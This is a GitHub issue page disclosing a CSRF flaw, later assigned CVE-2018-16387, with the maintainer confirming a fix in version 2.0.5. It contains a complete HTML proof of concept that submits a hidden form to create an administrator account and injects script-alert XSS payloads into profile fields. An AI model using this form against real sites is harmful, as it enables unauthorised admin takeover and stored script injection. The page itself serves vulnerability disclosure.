Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After the administrator logged in, open the following page poc: csrf.html---add a admin
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.98.59/user/add" method="POST"> <input type="hidden" name="name" value="test" /> <input type="hidden" name="email" value="test@qq.com" /> <input type="hidden" name="password" value="admin123" /> <input type="hidden" name="verify_pass" value="admin123" /> <input type="hidden" name="type" value="admin" /> <input type="hidden" name="company" value="<script>alert(1)</script>" /> <input type="hidden" name="title" value="<script>alert(1)</script>" /> <input type="hidden" name="website" value="" /> <input type="hidden" name="photo" value="" /> <input type="hidden" name="about" value="<script>alert(1)</script>" /> <input type="hidden" name="phone" value="" /> <input type="hidden" name="fax" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name="address2" value="" /> <input type="hidden" name="city" value="" /> <input type="hidden" name="state" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="zip" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
Hi, thanks for reporting this! I just pushed a commit that fixes this here, but I haven't pushed an update out yet because I want to go through to make sure there aren't others first.
Sorry, something went wrong.
Just pushed update 2.0.5 that fixes this. Thanks again for reporting it!
CVE-2018-16387 has been assigned for this issue.
No branches or pull requests
After the administrator logged in, open the following page
poc:
csrf.html---add a admin
The text was updated successfully, but these errors were encountered: